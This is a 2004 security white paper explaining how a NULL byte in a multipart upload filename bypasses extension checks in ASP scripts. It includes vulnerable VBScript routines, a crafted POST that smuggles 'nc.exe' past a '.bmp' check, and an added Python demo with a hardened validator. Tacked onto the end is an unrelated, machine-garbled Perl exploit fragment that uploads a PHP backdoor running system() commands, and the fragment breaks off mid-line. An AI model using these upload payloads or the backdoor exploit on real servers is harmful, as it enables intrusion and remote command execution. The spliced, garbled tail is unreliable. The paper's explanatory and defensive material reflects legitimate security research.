Copyright Security-Assessment.com Ltd 2004

White Paper

Title: 0x00 vs ASP file upload scripts
Prepared by: Brett Moore, Network Intrusion Specialist, Security-Assessment.com
Date: 13 July 2004

Abstract

The effects of the `Poison Null byte` have not been widely explored in ASP, but as with other languages the NULL byte can cause problems when ASP passes data to objects.

Many upload systems written in ASP suffer from a common problem whereby a NULL byte can be inserted into the filename parameter, leading to any extension after the null byte being ignored when writing the file. This means that in some cases it is possible to bypass checks for valid extensions, even if one is appended by the application.

This is very similar to attacks against Perl and PHP, the difference being how the null byte is sent to the application.

This problem arises when data is compared and validated in ASP script but passed to the FileSystemObject without checking for NULL bytes.

This document will discuss how ASP upload scripts can be affected by the Poison NULL byte attack.

Scope

The information in this document is based on research done on upload systems that incorporate multipart/form-data posts and the Scripting.FileSystemObject object.

Throughout this document we focus on the CreateTextFile method, which is used to create a file for writing, but it is possible that other object functions are vulnerable to the same type of problem.

A %00 or NULL can not be sent through the URL or a normal form post, as the web server registers this as the end of the string but does not store it in the filename variable.

When a filename is sent using a multipart/form-data post, the null byte will be included in the filename variable, thus affecting calls to the FileSystemObject.

File Uploading

File uploading is commonly done using an input object of type file and an encoding type of multipart/form-data.

The content type "application/x-www-form-urlencoded" is inefficient for sending large quantities of binary data or text containing non-ASCII characters. The content type "multipart/form-data" should be used for submitting forms that contain files, non-ASCII data, and binary data.

A "multipart/form-data" message contains a series of parts, each representing a successful control. The parts are sent to the processing agent in the same order the corresponding controls appear in the document stream.

When submitted, the form's data will be sent in the multipart/form-data format. This allows for the transfer of all bytes, including nulls, within the form's posted data.

Upon receiving the post, the target ASP page needs to process and decode the posted data into a usable state.
File Saving

At some point in the uploading process, the file will be saved to a file location. The following is some commonly used code to do this.

    Public Sub Save(filename)
        Dim objFSO, objFSOFile, Path
        Path = Server.MapPath("/uploads/")
        Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
        ' filename comes straight from the multipart post and is not checked here
        Set objFSOFile = objFSO.CreateTextFile(Path & "/" & filename)
        objFSOFile.Write fileData    ' fileData: the uploaded contents (variable name assumed)
        objFSOFile.Close
    End Sub

When a filename parameter is passed to the CreateTextFile() function, it may contain null bytes. This can affect the name of the created file, as CreateTextFile only reads up to the null byte when creating the file.

    Set objFSOFile = objFSO.CreateTextFile(Path & "/" & filename)

If filename contains a null byte, anything after that byte will be ignored.
Null Byte

The NULL byte can be inserted manually through modifications to the multipart post data using a hex editor, or by using a web proxy.

Multipart Form Post

    POST /upload.asp HTTP/1.0
    Content-Type: multipart/form-data; boundary=---------------------------7d4cb161b009c
    Host: localhost
    Content-Length: 359
    Pragma: no-cache
    Cookie: ASPSESSIONIDSAADRCRS=laknnakagmibjcoolbifeik

    -----------------------------7d4cb161b009c
    Content-Disposition: form-data; name="yourfile"; filename="c:/nc.exe.bmp"
    Content-Type: text/plain

    Proof of upload test file
    brett.moore@security-assessment.com
    -----------------------------7d4cb161b009c
    Content-Disposition: form-data; name="submit"

    Upload
    -----------------------------7d4cb161b009c--

The filename parameter of the above post has been changed as such:

    N  C  .  E  X  E  (null) .  B  M  P
    4E 43 2E 45 58 45   00   2E 42 4D 50

Note that an actual NULL byte (0x00) has been inserted between the .exe and the .bmp.

Script Tests

The following two file save scripts shown below are examples of upload scripts where the extension of the written file can be arbitrarily set. In both cases tFile is the filename parameter passed through the POST.
Example One (File Extension Appending)

    Public Sub Save(Path)
        Dim objFSO, objFSOFile
        Dim lngLoop
        Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
        ' ".bmp" is appended, but a null byte already inside tFile ends the name first
        Set objFSOFile = objFSO.CreateTextFile(objFSO.BuildPath(Path, tFile & ".bmp"))
        ' Write the file contents
        For lngLoop = 1 To LenB(m_Blob)
            objFSOFile.Write Chr(AscB(MidB(m_Blob, lngLoop, 1)))
        Next
        objFSOFile.Close
    End Sub

Example Two (File Extension Checking)

    Public Sub Save(Path)
        Dim objFSO, objFSOFile
        Dim lngLoop
        ' Check the file extension (looks only at the last four characters of tFile)
        If Right(tFile, 4) <> ".bmp" Then Exit Sub
        Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
        Set objFSOFile = objFSO.CreateTextFile(objFSO.BuildPath(Path, tFile))
        ' Write the file contents
        For lngLoop = 1 To LenB(m_Blob)
            objFSOFile.Write Chr(AscB(MidB(m_Blob, lngLoop, 1)))
        Next
        objFSOFile.Close
    End Sub

Final Summary

It has commonly been thought that web applications written in ASP are safe from the problems associated with NULL bytes. While in most instances this is true, it can be seen here that applications that make use of objects external to the native ASP scripting language can be affected by NULL bytes.

It is probable that other objects and areas can also be manipulated to some extent when their data is collected through a multipart/form-data post.

As in other areas, proper validation of user input is paramount to the security of web applications. It is therefore important to check input not only for common attack strings used for folder traversal, but also for NULL bytes before using the input in the creation of files.
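To make the behaviour described in the Null Byte and Script Tests sections concrete, and to show the check the Final Summary asks for, here is an added Python example. It is not code from the paper or from Security-Assessment.com. It parses a constructed multipart body modelled on the post above and shows that the filename is extracted with the 0x00 intact; it models the truncation CreateTextFile performs as a string split at the first NUL (the behaviour the paper describes, not a call to the real object); it re-implements the two Script Tests save routines as functions that return the name the file would actually be created under; and it finishes with a validation routine that rejects NUL bytes and directory components before testing the extension. The minimal parser, the function names and the allowed-extension set are assumptions of this example.

```python
import os
import re
from typing import Optional

# Constructed sample input, modelled on the multipart post in the paper.
# The filename field carries a literal 0x00 between ".exe" and ".bmp".
BOUNDARY = b"---------------------------7d4cb161b009c"
SAMPLE_BODY = b"".join([
    b"--" + BOUNDARY + b"\r\n",
    b'Content-Disposition: form-data; name="yourfile"; '
    b'filename="c:/nc.exe\x00.bmp"\r\n',            # embedded NUL byte
    b"Content-Type: text/plain\r\n\r\n",
    b"Proof of upload test file\r\n",
    b"--" + BOUNDARY + b"\r\n",
    b'Content-Disposition: form-data; name="submit"\r\n\r\n',
    b"Upload\r\n",
    b"--" + BOUNDARY + b"--\r\n",
])


def parse_multipart(body: bytes, boundary: bytes) -> list:
    """Minimal multipart/form-data parser (enough for this demonstration,
    not a full RFC 7578 implementation). Each part becomes a dict with
    'name', 'filename' and 'data'. The filename is returned exactly as
    sent, so an embedded NUL survives, just as it does in the ASP scripts."""
    delimiter = b"--" + boundary
    parts = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter reached
            break
        head, _, data = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        headers = head.decode("latin-1")
        name = re.search(r'(?<!file)name="([^"]*)"', headers)
        fname = re.search(r'filename="([^"]*)"', headers)
        parts.append({
            "name": name.group(1) if name else None,
            "filename": fname.group(1) if fname else None,
            "data": data[:-2] if data.endswith(b"\r\n") else data,
        })
    return parts


def fso_effective_name(name_arg: str) -> str:
    """Model of the behaviour the paper describes: CreateTextFile hands the
    string to a C-style API, so everything after the first NUL is ignored."""
    return name_arg.split("\x00", 1)[0]


def save_example_one(tfile: str) -> str:
    """Script Tests, Example One: '.bmp' is appended without inspecting tFile.
    Returns the name the file would actually be created under."""
    return fso_effective_name(tfile + ".bmp")


def save_example_two(tfile: str) -> Optional[str]:
    """Script Tests, Example Two: Right(tFile, 4) <> ".bmp" -> Exit Sub.
    Returns None when the script bails out, else the effective file name."""
    if tfile[-4:] != ".bmp":
        return None
    return fso_effective_name(tfile)


ALLOWED_EXTENSIONS = {".bmp"}        # assumed policy for this example


def validate_upload_name(tfile: str) -> str:
    """Hardened check (added here, not from the paper): reject NUL bytes
    before anything else, strip directory components, and test the
    extension of the complete string. Returns the safe base name or
    raises ValueError."""
    if "\x00" in tfile:
        raise ValueError("NUL byte in filename")
    base = tfile.replace("\\", "/").rsplit("/", 1)[-1]
    stem, ext = os.path.splitext(base)
    if not stem or stem in (".", "..") or ext.lower() not in ALLOWED_EXTENSIONS:
        raise ValueError("disallowed filename: %r" % tfile)
    return base


if __name__ == "__main__":
    sent = parse_multipart(SAMPLE_BODY, BOUNDARY)[0]["filename"]
    print("filename as received: %r" % sent)
    print("Example One writes:   %r" % save_example_one(sent))
    print("Example Two writes:   %r" % save_example_two(sent))
    try:
        validate_upload_name(sent)
    except ValueError as exc:
        print("hardened check:       rejected (%s)" % exc)
```

Run stand-alone, the script prints the received name with its NUL, shows that both Script Tests routines would end up writing `c:/nc.exe` (the appended or checked `.bmp` never reaches the file system), and that the hardened check refuses the name outright. The order of the checks matters: the NUL test comes first because any later string comparison in the scripting language sees the whole string while the object behind it does not.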
When the PHP program has specified PATH, the back door to the PATH file can be uploaded to any file.
Test procedure: NeatPic PHP directory direct reading 1.2.3
http://web.cncode.com/softview.asp?softid=1820
A vulnerability utilization program:! / Usr / bin / perl $ | = 1; Use socket; $ host = "127.0.0.1"; $ port = "80"; $ uploadto = ""; $ str = "---- ------------------------ 7D41F4A600472 / R / N "." Content-Disposition: Form-Data; Name = / "PATH /" / R /N "ww.ppp /r/n "ww.ppp /r/n"."-------------------------- --- 7d41f4a600472 / r / n "." Content-disposition: form-data; name = / "image /"; filename = / "f: //tools//1.gif/" / r / n "." Content-type: text / plain / r / n "." / R / n "." "System ($ c); / r / n". "?> / R / n "---------------------------- 7D41F4A600472 - / r / n". "/ R / n"; Print $ Str; $ LEN = Length ($ STR); Print $ LEN; $ REQ = "Post / 1/1/3721/index.php?action=upload http / 1.1 / r / n". "Accept: Image / GIF, Image / x-xbitmap, image / jpeg, image / pjpeg, application / msword, application / x-shockwave-flash, * / * / r / n "." Referr: http://127.0.0.1/index.php? Path =. / r / n "." accept-language: zh-cn / r / n "." Content-type: multipart / form-data; boundary = -------------- ------------ 7D41F4A600472 / R / N "." Accept-encoding: gzip, deflate / r / n "." User-agent: mozilla / 4.0 (compatible; msie 6.0; windows NT) 5.2; Hotbar 4.4.6.0; .NET CLR 1.1.4322) / r / n "." Host: 127.0.0.1/r/n "" in ",", "," Connection: Keep-alive / R / N ". "Cache-control: no-cache / r / n". "Cookie: phpsessid = 11111111111111111111111111111111111111111/ r / n". "$ STR / R / N / R / N"; Print $ Req; @res = sendraw ($ reg); print @res; #hmm ... Maybe you can send it by other way subsendraw {my ($ reg) = @_; my $ target; $ target = inet_aton ($ host) || DIE ("